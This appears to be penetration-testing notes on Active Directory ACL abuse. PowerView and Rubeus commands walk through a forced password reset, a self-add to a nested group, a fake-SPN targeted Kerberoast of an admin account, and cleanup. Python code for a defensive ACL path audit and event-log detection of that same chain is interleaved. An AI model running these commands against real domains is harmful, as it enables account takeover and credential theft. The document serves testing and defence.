Get-Acl and Get-ADUser
<aside>
Creating a list of Domain Users
Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt
Read each line of the file, retrieve the ACL for each domain user, and select just the Access property. Note that -match takes a regular expression, so the single backslash in DOMAIN\user must be written as \\ in the pattern.
foreach($line in [System.IO.File]::ReadLines("C:\Users\Wook\Desktop\ad_users.txt")) {Get-Acl "AD:\$(Get-ADUser $line)" | Select-Object Path -ExpandProperty Access | Where-Object {$_.IdentityReference -match 'DOMAIN\\[user]'}}
See if a group is nested into any other groups, because nested group membership means that any user in group A inherits all rights of every group that group A is nested into.
Get-DomainGroup -Identity [Group] | select memberof
</aside>
<aside>
Import-Module .\PowerView.ps1
$sid = Convert-NameToSid [username]
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid} -Verbose
</aside>
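The two asides above enumerate ACEs per principal and check group nesting by hand. As an added example (not code from the page or from PowerView), the audit below does the same over an exported ACE list: it expands nested group membership transitively, keeps only allow ACEs that grant takeover rights (GenericAll, GenericWrite, WriteDacl, WriteOwner, or the User-Force-Change-Password extended right on a user object), and reports the chain of ACEs through which a low-privileged principal can reach a sensitive account, so each link can be remediated. The ACE records, the HARI group nesting and the DN-to-name map are constructed sample data with the field names Get-DomainObjectACL -ResolveGUIDs emits; nothing is queried from a domain.

```python
from collections import deque

# Rights that let the holder take over the object the ACE applies to.
TAKEOVER_RIGHTS = {"GenericAll", "GenericWrite", "WriteDacl", "WriteOwner"}
# Resolved name of the extended right shown by -ResolveGUIDs.
FORCE_CHANGE_PASSWORD = "User-Force-Change-Password"

# Constructed sample export (shape of Get-DomainObjectACL -ResolveGUIDs output), not real data.
ACES = [
    {"ObjectDN": "CN=leon,CN=Users,DC=hari,DC=local", "ObjectClass": "user",
     "IdentityReference": "HARI\\wook", "ActiveDirectoryRights": "ExtendedRight",
     "ObjectAceType": "User-Force-Change-Password", "AceType": "AccessAllowedObject"},
    {"ObjectDN": "CN=Help Desk Level 1,OU=Groups,DC=hari,DC=local", "ObjectClass": "group",
     "IdentityReference": "HARI\\leon", "ActiveDirectoryRights": "GenericWrite",
     "ObjectAceType": None, "AceType": "AccessAllowed"},
    {"ObjectDN": "CN=levi,CN=Users,DC=hari,DC=local", "ObjectClass": "user",
     "IdentityReference": "HARI\\Information Technology", "ActiveDirectoryRights": "GenericAll",
     "ObjectAceType": None, "AceType": "AccessAllowed"},
    {"ObjectDN": "CN=levi,CN=Users,DC=hari,DC=local", "ObjectClass": "user",
     "IdentityReference": "HARI\\Domain Admins", "ActiveDirectoryRights": "GenericAll",
     "ObjectAceType": None, "AceType": "AccessAllowed"},   # expected admin entry
    {"ObjectDN": "CN=levi,CN=Users,DC=hari,DC=local", "ObjectClass": "user",
     "IdentityReference": "HARI\\Contractors", "ActiveDirectoryRights": "GenericAll",
     "ObjectAceType": None, "AceType": "AccessDenied"},    # deny ACE: must not count
]

# Constructed nesting: member -> groups it is a direct member of (what `select memberof` shows).
MEMBER_OF = {
    "HARI\\Help Desk Level 1": ["HARI\\Information Technology"],
    "HARI\\wook": ["HARI\\Domain Users"],
}

# Constructed map from object DN to the principal name that object represents.
OBJECT_NAMES = {
    "CN=leon,CN=Users,DC=hari,DC=local": "HARI\\leon",
    "CN=levi,CN=Users,DC=hari,DC=local": "HARI\\levi",
    "CN=Help Desk Level 1,OU=Groups,DC=hari,DC=local": "HARI\\Help Desk Level 1",
}


def nested_groups(principal, member_of=MEMBER_OF):
    """All groups `principal` belongs to transitively; rights of each apply to the member."""
    seen, queue = set(), deque([principal])
    while queue:
        for grp in member_of.get(queue.popleft(), ()):
            if grp not in seen:
                seen.add(grp)
                queue.append(grp)
    return seen


def controlling_aces(ace_list=ACES):
    """Yield (holder, target, right) for each allow ACE that hands control of its object to the holder.

    Deny ACEs are skipped outright; full allow/deny ordering semantics are not modelled here."""
    for ace in ace_list:
        if not ace["AceType"].startswith("AccessAllowed"):
            continue
        target = OBJECT_NAMES.get(ace["ObjectDN"])
        if target is None:
            continue
        rights = {r.strip() for r in ace["ActiveDirectoryRights"].split(",")}
        if rights & TAKEOVER_RIGHTS:
            yield ace["IdentityReference"], target, ",".join(sorted(rights & TAKEOVER_RIGHTS))
        elif ("ExtendedRight" in rights and ace["ObjectClass"] == "user"
              and ace["ObjectAceType"] == FORCE_CHANGE_PASSWORD):
            yield ace["IdentityReference"], target, FORCE_CHANGE_PASSWORD


def control_paths(start, ace_list=ACES, member_of=MEMBER_OF):
    """BFS over 'holder can take over target' edges.

    Returns {reachable principal: [(holder, target, right), ...]}; a group reached this way
    counts as controlled because GenericWrite/GenericAll on a group allows editing its members."""
    edges = {}
    for holder, target, right in controlling_aces(ace_list):
        edges.setdefault(holder, []).append((target, right))
    paths, queue = {start: []}, deque([start])
    while queue:
        cur = queue.popleft()
        for holder in {cur} | nested_groups(cur, member_of):   # inherited rights via nesting
            for target, right in edges.get(holder, ()):
                if target not in paths:
                    paths[target] = paths[cur] + [(holder, target, right)]
                    queue.append(target)
    return paths


if __name__ == "__main__":
    for target, path in control_paths("HARI\\wook").items():
        if path:
            print(target, "<-", " ; ".join(f"{h} has {r} on {t}" for h, t, r in path))
```

Each reported link is an ACE a defender can remove or justify; the Domain Admins entry on levi is present in the sample but is never reached from wook, and the deny ACE for Contractors is ignored, which is what the audit should do.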
<aside>
The chain is:
- wook user: change the password for the leon user.
- leon user: leverage GenericWrite rights to add a user that we control to the Help Desk Level 1 group.
- Information Technology group (which Help Desk Level 1 is nested into): leverage GenericAll rights to take control of the levi user.
So first, we must authenticate as wook and force change the password of the user leon.
Authenticating as wook. We could skip this step if we were already running as the user.
$wookPassword = ConvertTo-SecureString '[password]' -AsPlainText -Force
$wookCred = New-Object System.Management.Automation.PSCredential('HARI\wook',$wookPassword)
This represents the password we want to set for the target user
$leonPassword = ConvertTo-SecureString 'LeonPassword123' -AsPlainText -Force
Import-Module .\PowerView.ps1
Set-DomainUserPassword -Identity leon -AccountPassword $leonPassword -Credential $wookCred -Verbose
Now we authenticate as the leon user and add ourselves to the Help Desk Level 1 group.
$leonPassword = ConvertTo-SecureString 'LeonPassword123' -AsPlainText -Force
$leonCred = New-Object System.Management.Automation.PSCredential('HARI\leon',$leonPassword)
Get-ADGroup -Identity "Help Desk Level 1" -Properties * | Select -ExpandProperty Members
Add-DomainGroupMember -Identity "Help Desk Level 1" -Members 'leon' -Credential $leonCred -Verbose
Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName
At this point, we should be able to leverage our new group membership to take control over the levi user. Now, let’s say that our client permitted us to change the password of the leon user, but the levi user is an admin account that cannot be interrupted. Since we have GenericAll rights over this account, we can perform a targeted Kerberoasting attack by modifying the account’s servicePrincipalName attribute to create a fake SPN that we can then Kerberoast to obtain the TGS ticket and crack the hash offline.
We must be authenticated as a member of the Information Technology group for this to be successful. Since we added leon to the Help Desk Level 1 group, we inherited rights via nested group membership. We can now use Set-DomainObject to create the fake SPN. We could use the tool targetedKerberoast to perform this same attack from a Linux host, and it will create a temporary SPN, retrieve the hash, and delete the temporary SPN all in one command.
Set-DomainObject -Credential $leonCred -Identity levi -Set @{serviceprincipalname='notahacker/LEGIT'} -Verbose
If this worked, we should be able to Kerberoast the user using any number of methods to obtain the hash.
.\Rubeus.exe kerberoast /user:levi /nowrap
</aside>
<aside>
Set-DomainObject -Credential $leonCred -Identity levi -Clear serviceprincipalname -Verbose
Remove-DomainGroupMember -Identity "Help Desk Level 1" -Members 'leon' -Credential $leonCred -Verbose
Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName |? {$_.MemberName -eq 'leon'} -Verbose
</aside>
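Every step of the chain above and of the cleanup aside leaves Security log events on the domain controller, and the cleanup only adds more of them. As an added example (not code from the page, PowerView or Rubeus), the detector below correlates those events over a constructed sample: a 4724 password reset by a different account, a 4728 in which the added member is the subject itself (a user adding themselves to a group), a 5136 that writes servicePrincipalName on a user object, a 4769 for that account with RC4 (0x17) shortly after, and the later 5136 Value Deleted that shows the SPN being removed again. Field names follow the real event schemas; timestamps, account names and the OperationType strings (shown resolved instead of as %%14674/%%14675 codes) are constructed assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample events in the order a SIEM might hand them over (not chronological).
EVENTS = [
    {"time": "2024-05-01T09:00:00", "EventID": 4724, "SubjectUserName": "svc_helpdesk",
     "TargetUserName": "bob"},                                                    # benign reset
    {"time": "2024-05-01T10:00:00", "EventID": 4724, "SubjectUserName": "wook",
     "TargetUserName": "leon"},
    {"time": "2024-05-01T10:03:00", "EventID": 4728, "SubjectUserName": "leon",
     "MemberName": "CN=leon,CN=Users,DC=hari,DC=local", "TargetUserName": "Help Desk Level 1"},
    {"time": "2024-05-01T09:30:00", "EventID": 4728, "SubjectUserName": "admin",
     "MemberName": "CN=bob,CN=Users,DC=hari,DC=local", "TargetUserName": "Finance"},  # benign add
    {"time": "2024-05-01T10:05:00", "EventID": 5136, "SubjectUserName": "leon",
     "ObjectDN": "CN=levi,CN=Users,DC=hari,DC=local", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "servicePrincipalName", "AttributeValue": "notahacker/LEGIT",
     "OperationType": "Value Added"},
    {"time": "2024-05-01T10:06:00", "EventID": 4769, "TargetUserName": "leon@HARI.LOCAL",
     "ServiceName": "levi", "TicketEncryptionType": "0x17"},
    {"time": "2024-05-01T10:20:00", "EventID": 5136, "SubjectUserName": "leon",
     "ObjectDN": "CN=levi,CN=Users,DC=hari,DC=local", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "servicePrincipalName", "AttributeValue": "notahacker/LEGIT",
     "OperationType": "Value Deleted"},
    {"time": "2024-05-01T10:21:00", "EventID": 4729, "SubjectUserName": "leon",
     "MemberName": "CN=leon,CN=Users,DC=hari,DC=local", "TargetUserName": "Help Desk Level 1"},
]


def ts(event):
    return datetime.fromisoformat(event["time"])


def cn(dn):
    """'CN=leon,CN=Users,DC=hari,DC=local' -> 'leon'."""
    first = dn.split(",", 1)[0]
    return first.split("=", 1)[1] if "=" in first else first


def within(later, earlier, window):
    return timedelta(0) <= ts(later) - ts(earlier) <= window


def detect_chain(events, window=timedelta(hours=1)):
    """Return findings for self-adds to groups and SPN writes on user objects, each
    enriched with the preceding reset / following RC4 TGS / later cleanup if present."""
    ev = sorted(events, key=ts)
    findings = []

    # Resets where someone other than the account owner set the password.
    resets = [e for e in ev if e["EventID"] == 4724
              and e["SubjectUserName"].lower() != e["TargetUserName"].lower()]

    # A user adding their own account to a group.
    for e in ev:
        if e["EventID"] == 4728 and cn(e["MemberName"]).lower() == e["SubjectUserName"].lower():
            f = {"stage": "self_add_to_group", "actor": e["SubjectUserName"],
                 "group": e["TargetUserName"], "time": e["time"]}
            prior = [r for r in resets if r["TargetUserName"].lower() == e["SubjectUserName"].lower()
                     and within(e, r, window)]
            if prior:                     # actor's password was just reset by someone else
                f["password_reset_by"] = prior[-1]["SubjectUserName"]
            findings.append(f)

    # servicePrincipalName added to a *user* object (needs "Audit Directory Service Changes"
    # plus a SACL on the object for 5136 to be logged at all).
    for w in ev:
        if (w["EventID"] != 5136 or w["ObjectClass"] != "user"
                or w["AttributeLDAPDisplayName"].lower() != "serviceprincipalname"
                or w["OperationType"] != "Value Added"):
            continue
        target = cn(w["ObjectDN"])
        f = {"stage": "spn_added_to_user", "actor": w["SubjectUserName"], "target": target,
             "spn": w["AttributeValue"], "time": w["time"]}
        # RC4 service ticket for that account soon after = targeted Kerberoast.
        tgs = [t for t in ev if t["EventID"] == 4769 and t["ServiceName"].lower() == target.lower()
               and t["TicketEncryptionType"] == "0x17" and within(t, w, window)]
        if tgs:
            f["kerberoasted_by"] = tgs[0]["TargetUserName"]
        # Cleanup leaves its own trail: the same value deleted later.
        f["spn_removed_afterwards"] = any(
            r["EventID"] == 5136 and r["OperationType"] == "Value Deleted"
            and r["ObjectDN"] == w["ObjectDN"] and r["AttributeValue"] == w["AttributeValue"]
            and ts(r) > ts(w) for r in ev)
        findings.append(f)
    return findings


if __name__ == "__main__":
    for finding in detect_chain(EVENTS):
        print(finding)
```

The benign help desk reset and the admin adding bob to Finance produce nothing on their own; the reset only becomes evidence once the reset account starts changing group membership, which is the correlation a plain per-event rule misses. A 4729 removal (last sample event) can be matched the same way as the 5136 deletion if the group change should be flagged as cleaned up.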